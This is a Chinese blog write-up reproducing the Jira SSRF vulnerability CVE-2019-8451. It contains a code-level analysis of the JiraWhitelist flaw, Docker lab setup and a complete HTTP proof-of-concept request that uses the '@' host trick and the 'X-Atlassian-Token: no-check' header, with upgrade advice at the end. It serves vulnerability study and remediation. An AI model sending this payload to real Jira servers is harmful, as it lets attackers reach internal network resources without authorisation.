Jira未授权SSRF漏洞(CVE-2019-8451)

最新推荐文章于 2024-05-01 16:26:45 发布
最新推荐文章于 2024-05-01 16:26:45 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 漏洞复现篇 文章标签: jira 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42181573/article/details/122258713
版权

漏洞描述

Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。

漏洞危害

远程攻击者可以利用此漏洞以Jira服务端的身份访问内网资源。

漏洞影响版本

Jira < 8.4.0

漏洞分析

两个关键信息点:
• 漏洞点在/plugins/servlet/gadgets/makeRequest
• 原因在于JiraWhitelist这个类的逻辑缺陷
首先直接去访问http://192.168.60.244:8080/plugins/servlet/gadgets/makeRequest会报404
在这里插入图片描述然后开始按照以往Jira/Confluence的漏洞搜索方法
在这里插入图片描述
然而通过这一点并没有搜出来直接到漏洞点的地方。换另一条思路,搜索:JiraWhitelist
在这里插入图片描述
找到了这个类是在atlassian-jira/WEB-INF/classes目录下,于是在IDEA中直接将这个目录加到Library中(否则调试无法进入),然后在其可疑方法allows下断点
在这里插入图片描述
发起一个/plugins/servlet/gadgets/makeRequest的请求,但是这个时候没能直接触发到断点。后来找到了一个跟这个比较像的url:/plugins/servlet/gadgets/dashboard-diagnostics深入跟进了一下,发现原来是所有/plugins/servlet开头的url会交给某一些类处理,而这是在web.xml中配置的:
在这里插入图片描述在这里插入图片描述这里url中的/plugins/servlet匹配到了servlet-module-container-servlet对应的servlet为:com.atlassian.jira.plugin.servlet.ServletModuleContainerServlet。然后后面通过request.getPathInfo()来获取url后面的内容。参考:https://blog.csdn.net/turkeyzhou/article/details/3270289
在这里插入图片描述获取到之后,去一个Map里查找
在这里插入图片描述找到这个pathInfo对应的Servlet descriptor
在这里插入图片描述然后根据这个descriptor找到具体的Servlet类
在这里插入图片描述这里显示已经找到了:
在这里插入图片描述这个Servlet为com.atlassian.gadgets.shindig.servlet.XsrfMakeRequestServlet。
至此终于定位到了处理具体请求的地方。
跟进这个类atlassian-jira/WEB-INF/atlassian-bundled-plugins/atlassian-gadgets- opensocial-plugin-4.3.9.jar!/com/atlassian/gadgets/shindig/servlet /XsrfMakeRequestServlet的doGet方法。
可以看到这里对请求中的请求头X-Atlassian-Token: no-check做了判断,如果请求中没有这个请求头,则直接响应404了。
在这里插入图片描述注:这个请求头是官方提供的一种绕过Jira自身CSRF防御的方式,用于告诉Jira不对此请求进行CSRF防御,方便在自动化脚本中使用。具体介绍可以参考:https://developer.atlassian.com/server/jira/platform/form-token-handling/
到这里就解释了为什么直接访问这个url会响应404了。
带上这个请求头,继续调试。跟进其父类即org.apache.shindig.gadgets.servlet.MakeRequestServlet的doGet方法。由于这个包没有在Jira提供的jar包中找到,最后去这里:https://repo1.maven.org/maven2/org/apache/shindig/shindig-gadgets/2.5.2/shindig-gadgets-2.5.2.jar 找了一个jar包作为Library供IDEA调试。最后跟进到了atlassian-jira/WEB-INF/classes/com /atlassian/jira/dashboard/JiraWhitelist#allows方法中,对请求中的url参数进行判断。
在这里插入图片描述如果请求中的 url满足以Jira服务的canonicalBaseUrl开头,则认为这个url符合白名单的规则:这里应该就是漏洞描述中atlassian-jira/WEB-INF/classes/com/atlassian/jira/dashboard/JiraWhitelist#allows方法的逻辑缺陷了。
符合白名单的规则就接着使用atlassian-jira-6.4.14-standalone/atlassian-jira/WEB-INF/lib/httpclient-4.3.6.jar!/org/apache/http/client/utils/URIUtils这个工具类将url中的协议名、Host名、端口等提取出来。
在这里插入图片描述在这里插入图片描述在这里插入图片描述通过跟踪代码,发现它只判断了url是否以<jira服务的协议://ip:port>开头,所以poc中能进行SSRF请求的协议只能是HTTP/HTTPS。

环境搭建

  1. 开启docker环境
    docker-compose build
    docker-compose up -d
    在这里插入图片描述
  2. 访问ip:8080进行安装,选择第二个
    在这里插入图片描述
  3. 按照提示继续即可

在这里插入图片描述在这里插入图片描述在这里插入图片描述4. 生成JIRA使用许可证
在这里插入图片描述5. 生成之后找到License Key,回到页面填上License Key继续安装
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
6. 至此,安装完毕

在这里插入图片描述

漏洞复现

  1. 先访问ip:8080,然后刷新抓包,将数据包替换为如下Poc:
GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:8080@www.baidu.com HTTP/1.1
Host: 10.206.1.8:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchangeb;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
X-Atlassian-Token: no-check
Connection: close
  1. 通过bupsuit进行请求如下,在响应中可以看到成功探测目标系统存在ssrf漏洞:
    在这里插入图片描述3. 通过bupsuit进行请求如下,在响应中可以看到探测失败则会显示响应500:
    在这里插入图片描述

POC验证:

使用方法:python3 poc.py -u http://192.168.60.244:8080
在这里插入图片描述

修复建议

升级到8.4.0及以上版本

Li-D
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞笔记--Jira 相关漏洞复现及利用
NoooEmotion的博客
01-28 3875
Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
jira漏洞复现
Shanfenglan's blog
12-03 3893
文章目录1. Atlassian Jira 模板注入漏洞CVE-2019-11581)1.1 利用参考文章 1. Atlassian Jira 模板注入漏洞CVE-2019-11581) 影响版本 4.4.x 5.x.x 6.x.x 7.0.x 7.1.x 7.2.x 7.3.x 7.4.x 7.5.x 7.6.x before 7.6.14 (the fixed version for 7.6.x) 7.7.x 7.8.x 7.9.x 7.10.x 7.11.x 7.12.x 7.13.x befor
2024年网安最新Web 安全漏洞 SSRF 简介及解决方案_httppost 修复ssrf漏洞
最新发布
2401_84301389的博客
05-01 366
攻击者可根据程序流程,使用应用所在服务器发出攻击者想发出的 http 请求,利用该漏洞来探测生产网中的服务,可以将攻击者直接代理进内网中,可以让攻击者绕过网络访问控制,可以下载授权的文件,可以直接访问内网,甚至能够获取服务器凭证。,其接受一个 url 参数,指向需要下载的文件地址,应用向该地址发起请求,下载文件至应用所在服务器,然后作后续处理。问题便来了,应用所在服务器在这里成了跳板机,攻击者利用这个接口相当于取得了内网权限,能够进行不少具有危害的操作。
Atlassian OAuth plugin SSRF(CVE-2017-9506)
公众号shadow sock7
04-25 2081
jira安装参考:https://blog.csdn.net/caiqiiqi/article/details/89017806 安装jira-6.4.14版本: https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-6.4.14.tar.gz 漏洞测试方法: https://%basepath...
Atlassian 修复Jira 中的完全读取SSRF漏洞
smellycat000的专栏
07-07 390
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Atlassian 公司的热门问题追踪和项目管理软件 Jira 易受一个服务器端请求伪造 (SSRF) 缺陷影响,在无需凭据的情况下即可遭滥用。Assetnote 公司的首席技术官兼创始人 Shubham Shah 在博客文章中指出,“根据Jira 实例的不同,有很多种方法可以在 Jira 上创建账户来利用该漏洞”,例如...
漏洞通告】CVE-2022-36803 Atlassian Jira Align权限提升漏洞
热爱学习,喜欢折腾!
10-17 338
Atlassian Jira Align是一个企业敏捷规划平台,可将工作与大规模的产品、项目和投资组合管理联系起来。10月14日,Atlassian修复了Jira Align中的一个权限提升漏洞CVE-2022-36803),该漏洞的CVSS评分为6.5。由于Atlassian Jira Align 10.109.2 之前版本中的 MasterUserEdit API 允许经过身份验证且具有 People 角色权限的用户使用 MasterUserEdit API 将任何用户角色修改为超级管理员。
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
docker-atlassian:基于docker容器的JIRA软件和Confluence的docker-compose业务流程
02-06
docker-atlassian:基于docker容器的JIRA软件和Confluence的docker-compose业务流程
jira扩展需要atlassian-extras-3.2.jar
04-25
jira扩展需要atlassian-extras-3.2.jar
JIRA-7.3.4-language-pack-zh_CN.jar汉化包
07-11
JIRA-7.3.4
jira-jigit-plugin-1.2.13.jar
12-04
安装这个插件,当Gitlab提交代码时描述中加入Jira的KEY,Jira会同步gitlab提交的描述信息和修改的详情到Jira的活动区域,方便查看。
CVE-2019-11581 Atlassian Jira授权服务端模板注入漏洞
公众号shadow sock7
07-17 2567
https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw
CVE-2019-8442:[Jira]授权敏感信息泄露
公众号shadow sock7
08-19 5829
https://note.youdao.com/ynoteshare1/index.html?id=4189e6fb21fb097a4109ac22f33b16cb&type=note 只是urlrewrite,不是那种直接读文件的,所以如果请求jsp的话,不会返回源码。只能读到一些不敏感的配置文件,所以影响有限。 ...
CVE-2019-8449 Jira 枚举用户漏洞的利用
BaCde's Blog
03-12 1362
一个很攻击门槛很低的漏洞。可结合其它漏洞配合来进行攻击。 首先来简单说一下这个漏洞,该漏洞就是在Jira 8.4.0以前的版本,攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。 2020年2月3日在exploit-db上公布了该漏洞利用脚本。地址: Jira 8.3.4 - Information Disclo...
SSRF-服务器端请求伪造(类型和利用方法)第3部分
Fly_鹏程万里
03-01 1116
4.实例 https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/ 在这里,页面参数获取外部资源并显示其内容。 S...
CVE-2018-13404:[Jira]VerifyPopServerConnection功能SSRF
公众号shadow sock7
05-07 903
来源:https://jira.atlassian.com/browse/JRASERVER-68527 由于需要管理员权限才能利用,危害较低。
SSRF(服务端请求伪造)
HoYim
04-11 342
SSRF (Server-side Request Forge, 服务端请求伪造) 1、概念: 它是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。 漏洞产生由于服务端提供了从其他服务器应用获取数据的功能且没有对地址和协议等做过滤和限制。比如从指定URL地址获取...
URL跳转漏洞bypass小结
热门推荐
飞空静渡
05-15 1万+
转自:https://landgrey.me/open-redirect-bypass/下面是owasp对URL跳转漏洞,也叫开放重定向漏洞(open redirect)的一段描述:Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cau...
jira-dev-tool怎么在react中安装使用
03-29
1. 首先,你需要在你的React项目中安装jira-dev-tool。可以使用npm或者yarn命令行工具来安装。 使用npm安装: ``` npm install jira-dev-tool --save-dev ``` 使用yarn安装: ``` yarn add jira-dev-tool --dev ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值